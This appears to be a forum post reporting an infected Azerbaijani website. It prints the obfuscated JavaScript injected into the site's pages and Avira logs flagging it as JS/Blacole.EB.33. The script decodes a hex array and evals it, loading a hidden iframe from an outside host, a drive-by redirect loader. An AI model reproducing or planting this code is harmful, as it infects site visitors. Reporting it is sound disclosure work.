http://qaynar.az/categories.php?parent_id=690

fireold

1. /*fde076*/
   
2. asq = function() {
   
3.     return n[i];
   
4. };
   
5. ww = window;
   
6. ss = String["fro" + "mC" + "harC" + "o" + "de"];
   
7. try {
   
8.     document.body = ~1
   
9. } catch (dgsgsdg) {
   
10.     zz = 12 * 2 + 1 + 1;
    
11.     whwej = 12;
    
12. }
    
13. if (whwej) {
    
14.     try {} catch (agdsg) {
    
15.         whwej = 0;
    
16.     }
    
17.     try {
    
18.         document.body--;
    
19.     } catch (bawetawe) {
    
20.         if (ww.document) {
    
21.             n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6d,0x6c,0x71,0x73,0x73,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6d,0x6c,0x71,0x73,0x73,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6d,0x6c,0x71,0x73,0x73,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x6d,0x6c,0x71,0x73,0x73,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6d,0x6c,0x71,0x73,0x73,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x6d,0x6c,0x71,0x73,0x73,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
    
22.             h = 2;
    
23.             s = "";
    
24.             if (whwej) {
    
25.                 for (i = 0; i - 495 != 0; i++) {
    
26.                     k = i;
    
27.                     s = s.concat(ss(eval(asq()) - 1));
    
28.                 }
    
29.                 z = s;
    
30.                 ww["eval"]("" + s);
    
31.             }
    
32.         }
    
33.     }
    
34. } /*/fde076*/

复制代码

Avira

2013/9/13 下午 02:59 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\innovaeditor[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作：
      檔案會移動至 '575615b6.qua' 名稱底下的隔離區目錄。.

2013/9/13 下午 02:59 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        767
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/13 下午 02:59 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\main[2].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作：
      檔案會移動至 '544c1bc5.qua' 名稱底下的隔離區目錄。.

2013/9/13 下午 02:59 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        766
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/13 下午 02:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\innovaeditor[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作：傳輸至掃描程式

2013/9/13 下午 02:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\main[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作：傳輸至掃描程式

2013/9/13 下午 02:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\innovaeditor[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作：拒絕存取

2013/9/13 下午 02:58 [Web Protection] 發現惡意程式碼
      從 URL "http://qaynar.az/scripts/innovaeditor.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作：已略過

2013/9/13 下午 02:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\main[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作：拒絕存取

2013/9/13 下午 02:58 [Web Protection] 發現惡意程式碼
      從 URL "http://qaynar.az/themes/hyops/main.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作：已略過

2013/9/13 下午 02:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\categories[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作：拒絕存取

2013/9/13 下午 02:58 [Web Protection] 發現惡意程式碼
      從 URL "http://qaynar.az/categories.php?parent_id=690" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作：已略過